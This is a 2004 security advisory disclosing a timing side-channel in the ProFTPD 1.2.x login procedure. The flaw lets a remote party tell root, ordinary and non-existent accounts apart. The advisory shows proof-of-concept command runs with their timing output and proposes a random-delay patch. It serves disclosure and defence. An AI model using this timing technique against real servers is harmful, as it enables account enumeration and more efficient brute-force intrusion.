ProFTPD 1.2.x remote users enumeration bug
LSS Security Advisory #LSS-2004-10-2
http://security.lss.hr
---
Title : ProFTPD 1.2.x remote users enumeration bug
Advisory ID : LSS#2004-10-2
Date : October 14th, 2004
Advisory URL: :
http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
Impact : Remote users enumeration
Risk level : Low
Vulnerability type : Remote
Vendors contacted : Proftpd.org, 09.09.2004.
---
==[ Overview
ProFTPD is a very popular FTP (File Transfer Protocol) server, included by
default in many Linux/Unix distributions. LSS Security Team discovered a
remote users enumeration bug in ProFTPD, which can be used to identify and
differentiate valid user accounts on the remote system. Vulnerabilities
similar to the one described here have already been discovered on many
other network servers.
==[ Vulnerability
It is possible to determine which user names are valid, which are special,
and which ones do not exist on the remote system. That is accomplished by
code execution path timing analysis attack at the ProFTPD login procedure.
There is a very small (but significant) difference in time delay of code
execution path between valid and non-valid user names. That can be used
to remotely determine the difference between existent and non-existent
users.
The time delay can be measured by using a simple FTP client that will
calculate elapsed time between 'USER' command sent by client, and the
server response. Because of the very short response period, elapsed time
should be measured in microseconds.
LSS has developed simple PoC exploit that is presented here:
Special user - root:
[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx root
Proftpd remote users discovery exploit
Coded by Leon / LSS Security
>-------------------------------------<
Login time: 720 | 493 | 446 | 444 | 443 | 441 | 441 | 442 |
Avrg: 483
.....
Login time: 732 | 462 | 445 | 442 | 445 | 442 | 442 | 442 |
Avrg: 481
.....
Login time: 725 | 470 | 450 | 447 | 446 | 447 | 446 | 446 |
Avrg: 484
Average login time for the special user (root) is about 480 usec. All other
special users will have approximately the same login time delay.
Normal user - ljuranic:
[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx ljuranic
Proftpd remote users discovery exploit
Coded by Leon / LSS Security
>-------------------------------------<
Login time: 885 | 634 | 617 | 615 | 614 | 613 | 615 | 738 |
Avrg: 666
.....
Login time: 892 | 701 | 623 | 617 | 618 | 618 | 618 | 616 |
Avrg: 662
.....
Login time: 927 | 658 | 622 | 619 | 617 | 616 | 617 | 616 |
Avrg: 661
Average login time for normal user (ljuranic) is about 660 usec. All other
normal users will have approximately the same login delay.
Non existent user - non-existent:
[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx non-existent
Proftpd remote users discovery exploit
Coded by Leon / LSS Security
>-------------------------------------<
Login time: 656 | 417 | 401 | 398 | 398 | 395 | 396 | 397 |
Avrg: 432
.....
Login time: 647 | 418 | 401 | 400 | 400 | 399 | 399 | 399 |
Avrg: 432
.....
Login time: 647 | 413 | 401 | 400 | 400 | 400 | 400 | 400 |
Avrg: 432
Average login time for non existent user is about 430 usec.
The time difference between three types of user accounts is evident, making
it easy to determine other valid, non-valid, and special user accounts.
This vulnerability can be used to launch more efficient brute-force
attacks.
===[ Affected versions
Vulnerability was successfully tested on ProFTPD versions 1.2.8 and 1.2.10,
but other versions may be vulnerable as well. Test server was placed on the
local Ethernet 10/100 network, and tests were conducted over the Internet.
===[ Fix
Pseudo-random usleep() at the login procedure that will obfuscate time leak.
Something like this:
proftpd-1.2.10/modules/mod_auth.c
1867a1868,1877
> {
> unsigned int randa;
> struct timeval tv;
> struct timezone tz;
> gettimeofday (&tv, &tz);
> srand(tv.tv_usec);
> randa = rand() % 20000;
> usleep(randa);
> }
>
After this simple patch is applied, it is impossible to tell which users do
and don't exist:
[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx root
Proftpd remote users discovery exploit
Coded by Leon / LSS Security
>-------------------------------------<
Login time: 14954 | 29854 | 19939 | 20024 | 20044 | 19931 | 29988 | 30009|
Avrg: 23092
.....
Login time: 11677 | 19802 | 20042 | 29941 | 20093 | 19899 | 20005 | 30015|
Avrg: 21434
.....
Login time: 18027 | 20062 | 19877 | 20006 | 20050 | 30049 | 19906 | 29989|
Avrg: 22245
===[ PoC Exploit
http://security.lss.hr/Poc/
===[ Credits
This vulnerability was found by Leon Juranic (ljuranic@xxxxxx).
===[ LSS Security Contact
LSS Security Team, <eXposed by LSS>
WWW : http://security.lss.hr
E-mail : security@xxxxxx
Tel : +385 1 6129 775